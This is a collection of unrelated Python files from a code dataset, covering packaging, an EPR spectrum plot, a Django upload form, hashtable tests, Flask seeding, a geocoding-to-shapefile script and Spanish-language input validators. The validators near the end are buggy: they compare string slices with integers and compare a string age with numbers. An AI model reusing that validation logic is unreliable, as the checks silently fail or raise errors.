+{"seq_id":"642044675","text":"import fileinput\n\nfrom setuptools import setup\nfrom subprocess import run, CalledProcessError, PIPE, DEVNULL\n\n\nPACKAGE_NAME = 'pytib'\n\n\ndef _untagged_dev_version():\n try:\n # parameters to get correct info if light weight tags are used\n r = run(('git', 'describe', '--tags', '--abbrev=0'),\n stdout=PIPE, stderr=DEVNULL, check=True)\n _dev_version = r.stdout.decode().strip()\n except CalledProcessError:\n _dev_version = '0.1.0'\n\n # Used for automatic development versions only!\n r = run(('git', 'rev-parse', 'HEAD'), stdout=PIPE, check=True)\n\n return f'{_dev_version}+git{r.stdout.decode().strip()}'\n\n\ntry:\n # Releases must be done with git tags\n r = run(('git', 'tag', '-l', '--points-at', 'HEAD'),\n check=True, stdout=PIPE, stderr=DEVNULL)\n _version = r.stdout.decode().strip()\n\n # If not, create a development version based on git commit\n if _version == '':\n _version = _untagged_dev_version()\nexcept CalledProcessError:\n _version = _untagged_dev_version()\n\nwith open(f'{PACKAGE_NAME}/__init__.py', 'a') as f:\n f.write(\"__version__ = '%s'\" % _version)\n\ntry:\n setup(\n name='pytib',\n version=_version,\n description='Produce Tibetan unicode from latin script',\n url='https://github.com/ironhouzi/pytib',\n author='Robin Skahjem-Eriksen',\n author_email='robin@skahjem-eriksen.no',\n license='MIT',\n packages=[\n 'pytib',\n ],\n scripts=['ptib'],\n install_requires=[\n 'click',\n ],\n include_package_data=True,\n zip_safe=False\n )\nfinally:\n # remove injected __version__ line so version control is unaffected by build\n for line in fileinput.input(f'{PACKAGE_NAME}/__init__.py', inplace=True):\n if line.startswith('__version__'):\n print('', end='')\n else:\n # keep every other line -- with inplace=True, anything not printed is lost\n print(line, end='')\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"342181486","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nPython code provided as is.\nMade by Vincent Wieczny, from Chemistry Department, ENS de Lyon, France\nThis code is under licence CC-BY-NC-SA. 
It enables you to reuse the code by mentioning the original author and without making profit from it.\n\"\"\"\n\n# Libraries\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl # needed for mpl.transforms in plot_data below\nimport numpy as np\nimport widgets\nimport scipy.constants as constants\nfrom matplotlib import rc\nimport matplotlib.patches as patches\n\n################################\n### Parameter initialization ###\n################################\n\n#Physical constants\nh=6.62607004e-34 #Planck constant (m2.kg.s-1)\nR=8.314 #Gas constant (J/K/mol)\nT=298.0 #Temperature (K)\neV=1.60e-19 #1 eV in J\n\n#EPR physical constants\ng=2.0023 #Landé g-factor\nmuB=9.274009994e-24 #Bohr magneton (J.T-1)\nnu=9388.2e6 #X-band frequency (Hz)\n\n#EPR magnetic field\nBmin=0 #T\nBmax=0.5 #T\nDeltaBmax=1e-1 #T\n\n# Modulated parameters\nparameters = {'DeltaB' : widgets.FloatSlider(value=0.05, description='$B_1$ $\\\\mathrm{(T)}$', min=0.03, max=DeltaBmax),\n 'B0' : widgets.FloatSlider(value=0.1, description='$B_0$ $\\\\mathrm{(T)}$', min=Bmin, max=Bmax)}\n\n#################\n### Functions ###\n#################\n\n#Down-state energy \ndef E_down(B0):\n return -0.5*g*muB*B0\n\n#Up-state energy \ndef E_up(B0):\n return 0.5*g*muB*B0\n\n#Transition energy \ndef E_trans():\n return h*nu\n\n#Resonant magnetic field\ndef B_trans():\n return E_trans()/(g*muB)\n\n#Sigma\ndef sigma(DeltaB):\n return DeltaB/6\n\n\ndef signal_abs(B0,DeltaB):\n return 1/(sigma(DeltaB)*np.sqrt(2*3.1416))*np.exp(-(B0-B_trans())**2/(2*sigma(DeltaB)**2))\n\n#Derivative signal\ndef signal_der(B0,DeltaB):\n return 1/(sigma(DeltaB)*np.sqrt(2*3.1416))*-(B0-B_trans())/sigma(DeltaB)**2*signal_abs(B0,DeltaB)\n\n#===========================================================\n# --- Plot of the updated curves ---------------------------\n#===========================================================\n\n\n## This function is called when the sliders are changed \ndef plot_data(B0,DeltaB):\n \n lines['Absorption spot'].set_data(B0,signal_abs(B0,DeltaB))\n lines['First derivative spot'].set_data(B0,signal_der(B0,DeltaB))\n truc['$Abs_courbe$'].set_data(B,signal_abs(B,DeltaB))\n truc['$Der_courbe$'].set_data(B,signal_der(B,DeltaB))\n truc['$E_\\\\mathrm{trans}$'].set_data([B0,B0],[-1,1])\n r1.set_transform(mpl.transforms.Affine2D().translate(B0-DeltaB/2,-E_trans()/2)+ax1.transData)\n r1.set_width(DeltaB)\n \n fig.canvas.draw_idle()\n\n\n##===========================================================\n## --- Initialization of the plot ---------------------------\n##===========================================================\n\n#Plot definition\nfig=plt.figure(figsize=(18,8))\n\nax1 = fig.add_axes([0.2, 0.2, 0.35, 0.7])\nax2 = fig.add_axes([0.60, 0.6, 0.35, 0.3])\nax3 = fig.add_axes([0.60, 0.2, 0.35, 0.3])\n\n\n#Plot comments\nfig.suptitle(r'Simulation of an EPR spectrum at X waveband for a free electron',weight='bold')\n\nfig.text(0.01,0.9,r'EPR magnetic field', multialignment='left', verticalalignment='top',weight='bold')\nfig.text(0.01,0.85,r'$B=B_0+B_1 \\\\ \\\\cos{(2 \\\\, \\\\pi \\\\, \\\\nu \\\\, t)}$', multialignment='left', verticalalignment='top')\nfig.text(0.01,0.82,r'with $\\\\nu=100 \\\\ \\\\mathrm{kHz}$', multialignment='left', verticalalignment='top')\nfig.text(0.01,0.77,r'EPR X band frequency', multialignment='left', verticalalignment='top',weight='bold')\nfig.text(0.01,0.72,r'$\\\\nu_\\\\mathrm{X}=9388.2 \\\\ \\\\mathrm{MHz}$', multialignment='left', verticalalignment='top')\nfig.text(0.01,0.67,r'EPR spin level energies', multialignment='left', verticalalignment='top',weight='bold')\nfig.text(0.01,0.62,r'Up-state', 
multialignment='left', verticalalignment='top')\nfig.text(0.01,0.59,r'$E_\\mathrm{up}=\\frac{1}{2} \\, g \\, \\mu_\\mathrm{B} \\, B$', multialignment='left', verticalalignment='top')\nfig.text(0.01,0.54,r'Down-state', multialignment='left', verticalalignment='top')\nfig.text(0.01,0.51,r'$E_\\mathrm{down}=-\\frac{1}{2} \\, g \\, \\mu_\\mathrm{B} \\, B$', multialignment='left', verticalalignment='top')\n\n\nB=np.arange(Bmin,Bmax,0.0005)\n\n\n\n\nif __name__=='__main__':\n \n ax1.plot(B,E_up(B),lw=2,color='red',label='Up-state energy')\n ax1.plot(B,E_down(B),lw=2,color='blue',label='Down-state energy')\n ax1.plot([Bmin,Bmax],[E_trans()/2,E_trans()/2],':',lw=2,color='grey',label='X-band energy') \n ax1.plot([Bmin,Bmax],[-E_trans()/2,-E_trans()/2],':',lw=2,color='grey') \n \n \n ax1.set_xlim(Bmin,Bmax)\n ax1.set_xlabel('$B_0$ $\\\\mathrm{(T)}$')\n ax1.set_ylabel('$E$ $\\\\mathrm{(J)}$')\n \n \n ax2.set_xlim(Bmin,Bmax)\n ax2.set_ylim(-10,150)\n ax2.set_yticklabels([])\n ax2.set_xlabel('$B_0$ $\\\\mathrm{(T)}$')\n ax2.set_ylabel('$Absorption \\\\ intensity$')\n \n \n ax3.set_xlim(Bmin,Bmax)\n ax3.set_ylim(-1000000,1000000)\n ax3.set_yticklabels([])\n ax3.set_xlabel('$B_0$ $\\\\mathrm{(T)}$')\n ax3.set_ylabel('$First \\\\ derivative \\\\ intensity$')\n \n truc={}\n \n truc['$E_\\\\mathrm{trans}$'], = ax1.plot([], [],'--',lw=2, color='gray',label='$B_0$')\n truc['$Abs_courbe$'], = ax2.plot([],[],lw=2,color='red',label='Absorption signal')\n truc['$Der_courbe$'], = ax3.plot([],[],lw=2,color='red',label='First derivative signal')\n r1 = ax1.add_patch(patches.Rectangle((0, 0),DeltaBmax,E_trans(), edgecolor = '#000000', facecolor = '#dddddd', fill=True,label='Excitation band'))\n\n lines = {}\n\n lines['Absorption spot'], = ax2.plot([],[],'o',color='black',lw=2)\n lines['First derivative spot'], = ax3.plot([],[],'o',color='black',lw=2)\n \n ax1.legend()\n ax2.legend()\n ax3.legend()\n \n param_widgets = widgets.make_param_widgets(parameters, plot_data, slider_box=[0.20, 0.05, 0.35, 0.05])\n choose_widget = widgets.make_choose_plot(lines,box=[0.01,0.2,0.12, 0.1])\n reset_button = widgets.make_reset_button(param_widgets,box=[0.85, 0.05, 0.10, 0.05])\n \n plt.show()\n","sub_path":"EPR/free_electron_EPR_spectrum/free_electron_EPR_spectrum.py","file_name":"free_electron_EPR_spectrum.py","file_ext":"py","file_size_in_byte":5901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"163997946","text":"import time\nfrom django.db import models\nfrom django.forms import ModelForm, forms\nfrom grants.settings import UPLOAD_USER_FOLDER\nfrom extuser.models import OrgUser\n\n\ndef user_directory_path(instance, filename):\n\t# uploads go to the directory MEDIA_ROOT/user_<id>/\n\treturn UPLOAD_USER_FOLDER + '{0}/{1}'.format(instance.user.id, filename)\n\n\nclass FileUser(models.Model):\n\tclass Meta:\n\t\tverbose_name = u'User file'\n\t\tverbose_name_plural = u'User files'\n\t\tdb_table = 'file_name'\n\n\tuser = models.ForeignKey(OrgUser)\n\n\tname_file = models.FileField(\n\t\tverbose_name=u'Full file path',\n\t\tupload_to=user_directory_path\n\t)\n\tname = models.FileField(\n\t\tverbose_name=u'File name',\n\t\tdefault=''\n\t)\n\tdate_joined = models.DateTimeField(\n\t\tverbose_name=u'Date added',\n\t\tdefault=time.strftime(\"%Y-%m-%d %H:%M:%S\")\n\t)\n\n\tdef __str__(self):\n\t\treturn u'File: {}'.format(str(self.name_file).split('/')[-1])\n\n\tdef __repr__(self):\n\t\treturn u'<{}>'.format(str(self.name_file).split('/')[-1])\n\n\nclass FormFileUser(ModelForm):\n\tclass Meta:\n\t\tmodel = FileUser\n\t\tfields = ['name_file']\n\n\tdef clean_name_file(self):\n\t\tname = self.cleaned_data['name_file']\n\t\tallowed_file = ['pdf', 'PDF', 'jpg', 'jpeg', 'png', 'gif', 'bmp']\n\t\texc = str(name.name.split('.')[-1])\n\t\tname.name = str(name.name).lower().replace(' ', '-').replace('_', '-')\n\t\terror = ''\n\t\tif len(name.name) < 2:\n\t\t\terror += u'The file name cannot be shorter than 2 characters!'\n\t\t\traise forms.ValidationError(error)\n\t\texc = [ae for ae in allowed_file if exc == ae]\n\t\tif not exc:\n\t\t\terror += u'Files with this extension are not allowed!'\n\t\t\traise forms.ValidationError(error)\n\t\treturn name\n\n","sub_path":"fileuser/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"577650186","text":"from collections import deque\n\nimport pytest\n\nfrom hashtable import Hashtable\n\n\ndef test_hash(hashtable):\n \"\"\"\n Hash function gives expected values.\n \"\"\"\n\n key = 'cat'\n\n expected = 8\n actual = hashtable.hash(key)\n\n assert actual == expected\n\n key = 'tac'\n\n actual = hashtable.hash(key)\n\n assert actual == expected\n\n\ndef test_add(hashtable):\n \"\"\"\n Can add a key-value pair to a hashtable.\n \"\"\"\n\n key = 'cat'\n value = 9\n hashtable.add(key, value)\n\n d = deque()\n d.append([key, value])\n\n expected = d[0]\n actual = hashtable.buckets[8][0]\n\n assert actual == expected\n\n\ndef test_add_collision(hashtable):\n \"\"\"\n Can add a key-value pair to a hashtable with collision.\n \"\"\"\n\n keys = ['cat', 'act']\n values = [9, 11]\n d = deque()\n for i in range(len(keys)):\n hashtable.add(keys[i], values[i])\n d.append([keys[i], values[i]])\n\n expected = d[i]\n actual = hashtable.buckets[8][i]\n\n assert actual == expected\n\n\ndef test_contains(hashtable):\n \"\"\"\n Can check a hashtable for a key-value pair.\n \"\"\"\n\n key = 'cat'\n value = 9\n hashtable.add(key, value)\n\n expected = True\n actual = hashtable.contains(key)\n\n assert actual == expected\n\n\ndef test_contains_collision(hashtable):\n \"\"\"\n Can check a hashtable for a key-value pair with hashtable collision.\n \"\"\"\n\n keys = ['cat', 'act']\n values = [9, 11]\n for i in range(len(keys)):\n hashtable.add(keys[i], values[i])\n\n expected = True\n actual = hashtable.contains(keys[1])\n\n assert actual == expected\n\n\ndef test_no_contains(hashtable):\n \"\"\"\n Not all key-value pairs need to be in a hashtable.\n \"\"\"\n\n key = 'cat'\n\n expected = False\n actual = hashtable.contains(key)\n\n assert actual == expected\n\n\ndef test_get(hashtable):\n \"\"\"\n Can get a value from a hashtable.\n \"\"\"\n\n key = 'cat'\n value = 9\n hashtable.add(key, value)\n\n expected = value\n actual = hashtable.get(key)\n\n assert actual == expected\n\n\ndef test_get_collision(hashtable):\n \"\"\"\n Can get a value from a hashtable with a collision\n \"\"\"\n\n keys = ['cat', 'act']\n values = [9, 11]\n for i in range(len(keys)):\n hashtable.add(keys[i], values[i])\n\n expected = values[1]\n actual = hashtable.get(keys[1])\n\n assert actual == expected\n\n\ndef test_no_get(hashtable):\n \"\"\"\n Can't get a value from a hashtable which isn't in the hashtable.\n \"\"\"\n\n key = 'cat'\n\n expected = None\n actual = hashtable.get(key)\n\n assert actual == expected\n\n\n# Fixtures\n\n\n@pytest.fixture\ndef hashtable():\n \"\"\"\n Hashtable instance.\n \"\"\"\n\n return 
Hashtable()\n","sub_path":"python/challenges/hashtable/test_hashtable.py","file_name":"test_hashtable.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"533878057","text":"from main import db\nfrom flask import Blueprint\n\ndb_commands = Blueprint(\"db-custom\", __name__)\n\n@db_commands.cli.command(\"create\")\ndef create_db():\n db.create_all()\n print(\"Tables created!\")\n\n@db_commands.cli.command(\"drop\")\ndef drop_db():\n db.drop_all()\n print(\"Tables deleted\")\n \n@db_commands.cli.command(\"seed\")\ndef seed_db():\n from models.Artists import Artists\n from models.User import User\n from main import bcrypt\n from faker import Faker\n import random\n\n faker = Faker()\n # users = []\n\n # for i in range(5):\n # user = User()\n # user.email = f\"test{i}@test.com\"\n # user.password = bcrypt.generate_password_hash(\"123456\").decode(\"utf-8\")\n # db.session.add(user)\n # users.append(user)\n\n # db.session.commit()\n\n for i in range(20):\n artist = Artists()\n artist.name = faker.catch_phrase()\n db.session.add(artist)\n \n db.session.commit()\n print(\"Tables seeded\")","sub_path":"src/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"9893741","text":"# -*- coding:utf-8 _*- \n\"\"\" \n@author:Administrator\n@file: merge_train_data_process.py\n@time: 2018/11/20\n\"\"\"\nimport pandas as pd\n\n\ndata = pd.read_csv('./merge_train_data.csv')\ndata_orgin = data\n\n# print(data.head())\nprint(data.shape)\ndata = data[abs(data.trainPrediction-data.daysOnMarket)<20]\n# print(data.head())\nprint(data.shape)\ndata.to_csv('../input/treb_toronto_3to8_1.csv')\ndata_orgin.to_csv('./orgin_data.csv')\n","sub_path":"first_reporter_task_one_week_finish/test_treb2/test_treb/merge_data_bak/merge_train_data_process.py","file_name":"merge_train_data_process.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"348577486","text":"## CREATED BY:\n## Gert Sterenborg; gertsterenborg@gmail.com\n## 21-01-2015\n\n##imports:\nimport os\nimport json\nimport urllib2\nimport osgeo.ogr, osgeo.osr\n\ndef getLatLng(place):\n ## Fetches coordinates from the google api\n url = \"http://maps.googleapis.com/maps/api/geocode/json?address=\"+place\n response = urllib2.urlopen(url)\n jsonF = json.loads(response.read())\n if jsonF['status'] == \"OK\":\n lat = jsonF['results'][0]['geometry']['location']['lat']\n lng = jsonF['results'][0]['geometry']['location']['lng']\n return lat,lng\n\ndef storeShp(placeDic):\n ## current file location\n path = os.path.dirname(os.path.realpath(__file__))+\"/\"\n ## remove shapefile\n removeShp(path,'places')\n spatialReference = osgeo.osr.SpatialReference()\n spatialReference.ImportFromEPSG(4326) ##WGS84 degrees coordinates\n driver = osgeo.ogr.GetDriverByName('ESRI Shapefile') # will select the driver foir our shp-file creation.\n shapeData = driver.CreateDataSource(path) #so there we will store our data\n layer = shapeData.CreateLayer('places', spatialReference, osgeo.ogr.wkbPoint) #this will create a corresponding layer for our data with given spatial information.\n layer_defn = layer.GetLayerDefn() # gets parameters of the current shapefile\n new_field = osgeo.ogr.FieldDefn('PLACE', osgeo.ogr.OFTString)\n layer.CreateField(new_field)\n point = 
osgeo.ogr.Geometry(osgeo.ogr.wkbPoint)\n i = 0\n for place in placeDic:\n point.AddPoint(placeDic[place]['lng'],placeDic[place]['lat']) #create a new point at given ccordinates\n featureIndex = i\n feature = osgeo.ogr.Feature(layer_defn)\n feature.SetGeometry(point)\n feature.SetFID(featureIndex)\n j = feature.GetFieldIndex(\"PLACE\")\n feature.SetField(j, place)\n layer.CreateFeature(feature)\n i+= 1\n shapeData.Destroy() #lets close the shapefile\n\ndef removeShp(path,fileName):\n ## removes the exsisting shapefile\n extensions = [\"shp\",\"shx\",\"prj\",\"dbf\"]\n for extension in extensions:\n command = \"rm \"+path+fileName+\".\"+extension\n os.system(command)\n\nif __name__ == \"__main__\":\n placeDic = {} ## dictionary where all the coordinates and places will be stored in\n with open(\"places.txt\") as f:\n for line in f:\n lineSplit = line.split(',')\n for place in lineSplit:\n lat,lng = getLatLng(place.strip())\n placeDic[place.strip()] = {\n 'lat':lat,\n 'lng':lng}\n storeShp(placeDic)\n try: ## show the result in qgis\n os.system(\"qgis places.shp\")\n except:\n pass\n\n \n","sub_path":"PlacesToShape.py","file_name":"PlacesToShape.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"433653077","text":"#!/usr/bin/env python3\n\nimport sys, os\nsys.path.insert(0, os.path.abspath('../lib'))\n\nimport time\nimport random\nimport numpy as np\n\nfrom common.core import BaseWidget, run, lookup\nfrom common.gfxutil import topleft_label, CEllipse, KFAnim, AnimGroup\n\nfrom kivy.uix.image import Image\nfrom kivy.core.image import Image as Img\nfrom kivy.uix.widget import Widget\nfrom kivy.core.window import Window\nfrom kivy.graphics import Color, Ellipse, Rectangle, Line\nfrom kivy.graphics.instructions import InstructionGroup\n\n\nclass InteractiveImage(Image):\n def __init__(self, **kwargs):\n super(InteractiveImage, self).__init__(**kwargs, keep_data=True, allow_stretch=True, keep_ratio=False)\n self.callback = None\n Window.bind(mouse_pos=self.on_mouse_pos)\n\n def set_callback(self, callback):\n self.callback = callback\n\n def collide_point(self, x, y):\n try:\n # Adjust x and y to reflect coordinates within the image\n x = (x - self.x) * self._coreimage.width / self.width\n y = (self.height - (y - self.y)) * self._coreimage.height / self.height\n color = self._coreimage.read_pixel(x, y)\n except:\n color = 0, 0, 0, 0\n if color[-1] > 0:\n return True\n return False\n\n def on_mouse_pos(self, window, pos):\n if self.collide_point(*pos):\n self.color = [1, 1, 1, 0.5]\n else:\n self.color = [1, 1, 1, 1]\n\n def on_touch_down(self, touch):\n if self.collide_point(*touch.pos):\n if not self.callback is None:\n self.callback()\n\n\nclass FadingMusicNote(InstructionGroup):\n def __init__(self, pos=(0, 0)):\n super(FadingMusicNote, self).__init__()\n self.body = Rectangle(pos=pos, size=(50, 50), texture=Img('./data/scene/eightnote.png').texture)\n self.pop_anim = KFAnim((0, self.body.size[0]), (.5, self.body.size[0]), (1.0, 0))\n mag = random.uniform(20, 30)\n theta = random.uniform(0, 2*np.pi)\n dx, dy = mag * np.cos(theta), mag * np.sin(theta)\n self.pos_anim = KFAnim((0, pos[0], pos[1]), (.5, pos[0] + dx, pos[1] + dy))\n self.add(self.body)\n self.time = 0\n self.active = True\n self.on_update(0)\n\n def on_update(self, dt):\n # the disappearing animation just reduces the size\n new_size = self.pop_anim.eval(self.time)\n new_pos = self.pos_anim.eval(self.time)\n self.body.size = (new_size, 
new_size)\n self.body.pos = new_pos\n self.time += dt\n return self.pop_anim.is_active(self.time)\n\n def start_anim(self):\n self.active = True\n\nclass FlyingCarWidget(Image):\n def __init__(self, init_pos, size, velocity, **kwargs):\n super(FlyingCarWidget, self).__init__(**kwargs)\n self.init_pos = init_pos\n self.size = size\n\n self.velocity = velocity\n self.t = time.time()\n\n self.anim_delay = 0.5\n\n def is_visible(self):\n x, y = self.pos\n w, h = self.size\n\n if self.velocity > 0:\n return x < Window.width\n else:\n return x + w > 0\n\n def on_update(self):\n t = time.time() - self.t\n x_0, y_0 = self.init_pos\n self.pos = (x_0 + self.velocity * t, y_0)\n\nclass FlyingCarGeneratorWidget(BaseWidget):\n\n car_assets = (\n (\"./data/scene/food_truck.gif\", \"./data/scene/food_truck_reverse.gif\"),\n (\"./data/scene/nyan_cat.gif\", \"./data/scene/nyan_cat_reverse.gif\"),\n (\"./data/scene/warp_ship.gif\", \"./data/scene/warp_ship_reverse.gif\"),\n (\"./data/scene/superman.png\", \"./data/scene/superman_reverse.png\"),\n (\"./data/scene/flying_delorean.png\", \"./data/scene/flying_delorean_reverse.png\"),\n )\n\n def __init__(self, y_range):\n super(FlyingCarGeneratorWidget, self).__init__()\n\n self.y_range = y_range\n self.speed = 90 # pixels/sec\n self.cars = []\n\n self.t_next_car = 0\n self.max_cars = 5\n\n def generate_car(self):\n\n # Choose random car asset\n forward, backward = random.choice(self.car_assets)\n\n # Choose randomly between forward and backward\n direction = random.choice([\"forward\", \"backward\"])\n if direction == \"forward\":\n source = forward\n velocity = self.speed * random.uniform(0.8, 1.2)\n x_0 = 0\n else:\n source = backward\n velocity = -self.speed * random.uniform(0.8, 1.2)\n x_0 = Window.width\n\n # Randomly select starting y coordinate\n y_0 = random.uniform(*self.y_range)\n\n # Construct car widget\n car = FlyingCarWidget((x_0, y_0), (100, 100), velocity)\n car.source = source\n self.cars.append(car)\n self.add_widget(car)\n\n\n def on_update(self):\n\n # Process updates for each car\n for car in self.cars:\n car.on_update()\n\n # Check for cars that have gotten\n cars_to_delete = []\n for i, car in enumerate(self.cars):\n if not car.is_visible():\n cars_to_delete.append(i)\n\n # Delete complete cars\n for i in cars_to_delete:\n self.remove_widget(self.cars[i])\n del self.cars[i]\n\n # Generate new cars if there's room and if we haven't\n # recently created a new car\n t_now = time.time()\n if len(self.cars) < self.max_cars and \\\n t_now > self.t_next_car:\n self.generate_car()\n self.t_next_car = t_now + random.uniform(1, 5)\n\nclass BackgroundWidget(BaseWidget):\n def __init__(self):\n super(BackgroundWidget, self).__init__()\n\n # Background\n self.background = Image(allow_stretch=True, keep_ratio=False)\n self.background.source = \"./data/scene/background.png\"\n self.add_widget(self.background)\n\n self.car_generator = FlyingCarGeneratorWidget((100, 500))\n self.add_widget(self.car_generator)\n\n def on_layout(self, win_size):\n self.background.size = win_size\n\n def on_update(self):\n pass\n\nclass ForegroundWidget(BaseWidget):\n def __init__(self):\n super(ForegroundWidget, self).__init__()\n\n # Foreground\n self.foreground = Image(allow_stretch=True, keep_ratio=False)\n self.foreground.source = \"./data/scene/foreground.png\"\n self.add_widget(self.foreground)\n\n # Amp\n self.amp = InteractiveImage()\n self.amp.source = \"./data/scene/amp.png\"\n self.amp.set_callback(lambda: print(\"amp\"))\n self.add_widget(self.amp)\n\n # 
Guitar\n self.guitar = InteractiveImage()\n self.guitar.source = \"./data/scene/guitar.png\"\n self.guitar.set_callback(lambda: print(\"guitar\"))\n self.add_widget(self.guitar)\n\n # Mic\n self.mic = InteractiveImage()\n self.mic.source = \"./data/scene/mic.png\"\n self.mic.set_callback(lambda: print(\"mic\"))\n self.add_widget(self.mic)\n \n # Radio\n self.radio = InteractiveImage()\n self.radio.source = \"./data/scene/radio.png\"\n self.radio.set_callback(lambda: print(\"radio\"))\n self.add_widget(self.radio)\n \n # File cabinet\n self.storage = InteractiveImage()\n self.storage.source = \"./data/scene/storage.png\"\n self.storage.set_callback(lambda: print(\"storage\"))\n self.add_widget(self.storage)\n\n def on_layout(self, win_size):\n self.foreground.size = win_size\n self.amp.size = win_size\n self.guitar.size = win_size\n self.mic.size = win_size\n self.radio.size = win_size\n self.storage.size = win_size\n \n\nclass Scene(BaseWidget):\n def __init__(self):\n super(Scene, self).__init__()\n\n self.background = BackgroundWidget()\n self.add_widget(self.background)\n\n self.foreground = ForegroundWidget()\n self.add_widget(self.foreground)\n\n # Flying music notes\n self.anim_group = AnimGroup()\n self.canvas.add(self.anim_group)\n self.anim_group.add(FadingMusicNote())\n\n def on_layout(self, win_size):\n self.background.on_layout(win_size)\n self.foreground.on_layout(win_size)\n\n def on_update(self):\n self.anim_group.on_update()\n\n def add_note_sprite(self):\n self.anim_group.add(FadingMusicNote((320, 80)))\n\n\nif __name__ == \"__main__\":\n run(Scene())\n","sub_path":"graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":8388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"415652401","text":"\n#ejercicio 01 \"validacion de un entero\"\ndef validar_un_entero(entero): #se aplica la funcion validar un entero\n if entero.isalnum()==True: #condicion doble\n validacion=\"El numero \"+str(entero)+\" si es entero\" #se guarda un valor en la variable validacion\n return validacion #retorna la variable validacion\n else:\n return False #retorna falso si la condicion es falsa\n #fin_def\n\n#ejercicio 2 \"validacion de una cadena\"\ndef validar_cadena(msg): #se aplica la funcion validar cadena:\n if msg.isalpha()==True:# #se aplica una condicional doble\n validacion_cadena=\"El valor \"+msg+\" si es una cadena \" #se guarda un valor en la variable validacion de cadena\n return validacion_cadena #retorna el valor de la variable validacion cadena\n else:\n return False #retorna falso si la condicion es falsa\n #fin_def\n\n\n#ejercicio 03 \"validacion de ataque y recompensa de un videojuego\"\ndef validar_dano(ataque): #funcion def\n print(\"INDICAR EL TIPO A QUIEN ATACA MELE o RANGO\") #se imprime un comentario inicial\n if ataque.isdigit()==False: #se valida si no es un numero condicion doble\n if ataque==\"MELE\": #condiciones multiples para ver que recommpensa se ganara\n rm=35\n recompensa_mele=\"Su recompensa es de: \"+str(rm)\n return recompensa_mele\n elif ataque==\"RANGO\":\n rr=43\n recompensa_rango=\"Su recompensa es de: \"+str(rr)\n return recompensa_rango\n else:\n comando=\"el comando ingresado es FALSO\"\n return comando\n else:\n return False\n#fin_def\n\n\n#ejercicio 04 \"validacion de impresion de numeros de 3 digitos\"\ndef validar_numero_tres_cifras(numero):#funcion def\n #validando si es de tres cifras\n if len(numero)==3:\n #validando si es entero\n if numero.isdigit()==True:\n return 
True\n\n else:\n return False\n else:\n return False\n#fin_def\n\n\n#ejercicio 05 \"validacion de una vocal\"\ndef validar_vocal(vocal):\n #validando la longitud\n if len(vocal)==1:\n #validando si es una vaocal ingresada\n if vocal==\"a\" or vocal==\"e\" or vocal==\"i\" or vocal==\"o\" or vocal==\"u\" :\n return True\n else:\n return False\n else:\n return False\n\n #fin_def\n\n#ejercicio 06 \"validacion de DNI\"\ndef validar_dni(DNI):\n #primero validamos la longitud de la cadena\n if len(DNI)==8:\n #valdidamos que los datos ingresados sean puros numero enteros\n if DNI.isdigit()==True:\n return True\n else:\n return False\n else:\n return False\n\n#ejercicio 07 \"validar Ruc SUNAT\"\ndef validar_ruc(RUC):\n fragmento=validar_dni(\"\")\n #primero validamos la longitud de la cadena que consta de 11 digitos\n if len(RUC)==11:\n #segundo validamos las condiciones de la cadena\n if RUC[0:2]==10:\n print(\"la persona es un trabajador fisico o natural\")\n #una ves que validamos todas las condiciones de la cadena sigue validar el numero de dni\n #para eso creamos una variable a al que llamemos a la funcion validar dni\n if RUC[2:11]==fragmento:\n #por ultimo hacemos la validacion delultimo codigo que siempre debe ser de 8\n if RUC[11]==8:\n print(\"el codigo es correcto\") #una ves que hicimos la validacion de la cadena lo que haremos finalmente es verificar si es int\n if RUC.isdigit()==True:\n return True\n else:\n return False\n else:\n return False\n else:\n return False\n elif RUC[0:2]==20:\n print(\"la persona es una trabajador fisico\")\n if RUC[2:11]==fragmento:\n if RUC[11]==8:\n print(\"el codigo es correcto\")\n if RUC.isdigit()==True:\n return True\n else:\n return False\n else:\n return False\n elif RUC[0:2]==15:\n print(\"La persona es una socidad \")\n if RUC[2:11]==fragmento:\n if RUC[11]==8:\n print(\"el codigo es correcto\")\n if RUC.isdigit()==True:\n return True\n else:\n return False\n else:\n return False\n elif RUC[0:2]==16:\n print(\"se menciona como valido\")\n if RUC[2:11]==fragmento:\n if RUC[11]==8:\n print(\"el codigo es correcto\")\n if RUC.isdigit()==True:\n return True\n else:\n return False\n else:\n return False\n elif RUC[0:2]==17:\n print(\"inscripcion durante 2019 a 2025\")\n if RUC[2:11]==fragmento:\n if RUC[11]==8:\n print(\"el codigo es correcto\")\n if RUC.isdigit()==True:\n return True\n else:\n return False\n else:\n return False\n else:\n\n return False\n\n else:\n return False\n\n\n\n#ejercicio 08 \"validar un numero capicua\"\n\ndef validar_capicua(capicua):\n #primero validamos que sea int\n if capicua.isdigit()==True:\n #segundo para que un numero sea capicua tiene que ser igual que su inversa entonces\n if capicua==capicua[::-1]:\n return True\n else:\n return False\n else:\n return False\n\n #fin_si\n#fin_def\n\n\n#ejercicio 09 \"validar edad\"\ndef validar_edad(edad):\n #primero validar si es entero\n if edad.isdigit()==True:\n if edad>0 and edad<120:\n return True\n else:\n return False\n\n else:\n return False\n #fin_si\n\n#fin_def\n\n#ejercicio 10 \"validar codigo de alumno de UNPRG\"\ndef validar_codigo_unprg(codigo):\n #primero validamos la longitud de la cadena\n if len(codigo)==7:\n #validacion de los dos primero digitos\n if codigo[0:2]==19:\n #validamos la ultima parte de la cadena\n if 